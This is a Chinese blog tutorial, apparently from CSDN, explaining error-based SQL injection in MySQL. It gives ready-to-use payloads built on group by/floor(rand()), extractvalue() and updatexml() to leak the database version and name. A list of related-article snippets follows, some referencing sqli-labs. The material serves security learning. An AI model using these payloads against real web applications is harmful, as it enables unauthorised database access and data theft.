sql注入之报错注入

最新推荐文章于 2024-06-06 19:11:19 发布
最新推荐文章于 2024-06-06 19:11:19 发布
阅读量334 收藏
点赞数
文章标签: 大数据 sql mysql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45711977/article/details/125446324
版权

报错注入

在注入点判断过程中,发现数据库中SQL语句的报错信息会显示在页面中,因此可以进行报错注入。

原理:在错误信息中执行SQL语句,触发报错方式有很多,原理也不尽相同,建议直接背公式。

  1. group by重复键冲突

[?id=33 and(select 1 from(select count(*),concat((select version() from information_schema.tables limit 0,1),floor(rand()*2))x from information_schema.table group by x)a)-- +]

Ps: group by是MYSQL的一个语句,它实际上的意思是分类聚合

这时会发现报错注入成功的拿到了想要的信息,接下来把version()替换成database()出现

由此可见报错存在一定几率和概率注入失败

group by 其实是mysql的一个bug,编号为#8652,当使用rand()分组聚合的时候,会产生重复键的错误。

参考连接:MySQL Bugs

2.XPATH报错

@   extractalue()

[?id=33 and extractvalue(1,concat(‘^’,(select version()),‘^’))-- +]

@   updatexml()

[?id=33 and updatexml(1,concat(‘^’,(select database()),’^’),1)-- +]

Ps:这个是基于函数报错来进行注入,如果版本没有该函数,就用group by 来进行注入,mysql数据库中5.0以下版本是不具有这个函数的

是木木啊.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
SQL注入报错注入
m0_56578216的博客
08-23 1162
table_name=0x636d735f7573657273是cms_users表名转16进制后的结果,如果直接用表名’cms_users’,会导致表名被cms**转义并报错,**所以需要避免单引号的使用。在注入点的判断过程中,发现数据库SQL 语句的报错信息,会显示在页面中,因此可以利用报错信息进行注入。limit 0,1:用来限定取第0行的一行记录,由于有8个表,也就是有8行数据,多取会报错。limit 1,1:用来限定取第1行的一行记录,由于有3行数据,多取会报错。
《网络安全自学教程》- SQL注入报错注入原理+步骤+实战操作
wangyuxiang946的博客
03-07 2519
这篇文章为大家解析报错注入的实现原理,结合实战案例讲解报错注入的使用步骤。
sql注入-报错注入
课嗨教育的专栏
04-29 797
渗透测试基础课-课程进度_不死的小鱼的博客-CSDN博客 1.什么是报错注入 mysql_error 2.我们在什么情况下使用报错注入 在页面返回连错错误信息的时候 3.函数 updatexml //5.1版本以上使用 extrachvalue floor //5.0版本之前也可以使用 请求:http://localhost/Less-1/index.php?id=1%27 // %27是英文单引号的url编码,是被浏览器自动编码的 %20 是空格 返回:1' LIMIT 0,1 htt...
sql报错注入
球球的博客
02-18 837
sql报错注入,floor报错注入,extractvalue报错注入,updatexml报错注入
Sql注入-报错注入
最新发布
WolvenSec的博客
06-06 1099
报错注入(Error-Based Injection)是一种通过引起数据库报错并从错误信息中提取有用信息的SQL注入攻击手法;攻击者利用数据库在处理异常情况时返回的错误消息,来推断出数据库结构、字段名甚至数据内容;这种攻击方法依赖于数据库将详细的错误消息返回给客户端。若在测试时发现网页会回显sql相关的报错信息,那么此时就可以尝试使用错误注入这种方式进行渗透。可以利用报错注入的前提:就是页面有错误信息显示出来、保证函数能够正确执行。
SQL注入-报错注入
m0_53820621的博客
08-15 1000
SQL注入-报错注入
sql 报错注入
travelnight的博客
03-15 4100
以往个人知识星球搬运 by travelnight 这里以sql-libs为例。 一、基础报错注入 这里的东西比较简单,快速略过。 访问:http://127.0.0.1/sqllabs/Less-1/ 直接构造id参数 http://127.0.0.1/sqllabs/Less-1/?id=1 直接加 ‘触发报错 直接闭合‘ 标签发现正常,说明存在报错注入。 http://127.0.0.1/sqllabs/Less-1/...
33-33.渗透测试渗透测试之SQL注入基于报错注入(下)
05-10
渗透测试渗透测试之SQL注入基于报错注入(下)
SQL注入报错注入函数
cyjmosthandsome的博客
02-26 6725
一、extractvalue() extractvalue(xml_frag,xpath_expr)函数接受两个参数,第一个为XML标记内容,也就是查询的内容,第二个为XPATH路径,也就是查询的路径。如果没有匹配内容,不管出于何种原因,只要xpath_expr有效,并且xml_frag由正确嵌套和关闭的元素组成 - 返回空字符串。不区分空元素的匹配和无匹配。但是如果X...
SQL注入报错注入
qq_68163788的博客
01-27 2062
QL注入是一种常见的安全漏洞,它允许攻击者通过在应用程序的输入中注入恶意的SQL代码来执行未经授权的数据库操作。报错注入是一种SQL注入的类型,它利用数据库在执行恶意SQL语句时产生的错误消息来获取有关数据库结构和数据的信息。 假设有一个使用用户输入构建SQL查询的应用程序。攻击者可以通过在输入中注入恶意的SQL代码来触发数据库错误,并从错误消息中获取有关数据库的信息,如表名、列名等。这些信息可以帮助攻击者进一步利用数据库
sql注入报错注入
2401_82760239的博客
04-02 1443
报错注入就是利用率数据库的某些机制,人为的制造错误条件,使得查询结果能够出现在错误的信息中。
SQL注入——报错注入
weixin_30510153的博客
03-28 277
0x00 背景   SQL注入长期位于OWASP TOP10 榜首,对Web 安全有着很大的影响,黑客们往往在注入过程中根据错误回显进行判断,但是现在非常多的Web程序没有正常的错误回显,这样就需要我们利用报错注入的方式来进行SQL注入了。这篇文章会讲解一下报错注入的产生原理和利用案例。 0x01 十种报错注入   这十种方式在这里不多讲了,详情移步https://www.cnbl...
sql注入——报错注入
m0_73756016的博客
10-18 1960
报错注入是什么 什么是报错注入? 这是一种页面响应形式。响应过程如下: 用户在前台页面输入检索内容 后台将前台页面上输入的检索内容无加区别的拼接成sql语句,送给数据库执行。 数据库将执行的结果返回给后台,后台将数据库执行的结果无加区别的显示到前台页面上。 报错注入存在的基础:两个“无加区别”后台对于输入输出的合理性没有做检查 分类 1. 通过floor()报错注入 2.通过extractValue()报错注入 3.通过updateXml()报错注入 4.通过NAME_CONST()
sql注入updatexml报错注入
06-08
SQL注入是一种常见的安全漏洞,其中updatexml是一种常用的注入方式之一。如果你在使用updatexml时遇到了报错,可能是由于以下原因: 1. SQL语句中的updatexml函数使用不正确,参数数量或类型不匹配,导致SQL语句执行失败。 2. 数据库对updatexml函数的支持不完整,某些版本的数据库可能不支持某些参数或功能,导致SQL语句执行失败。 3. 输入的注入payload不正确,可能造成语法错误或类型不匹配等问题,导致SQL语句执行失败。 为了解决这个问题,你可以尝试以下方法: 1. 检查SQL语句中updatexml函数的使用是否正确,确保参数数量和类型正确。 2. 检查数据库版本和配置,确保数据库对updatexml函数的支持完整。 3. 检查输入的注入payload是否正确,可以使用工具或手动构造payload进行测试,找出问题所在。 此外,为了避免SQL注入等安全漏洞,建议在编写代码时使用参数化查询,或对输入进行严格的过滤和验证。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值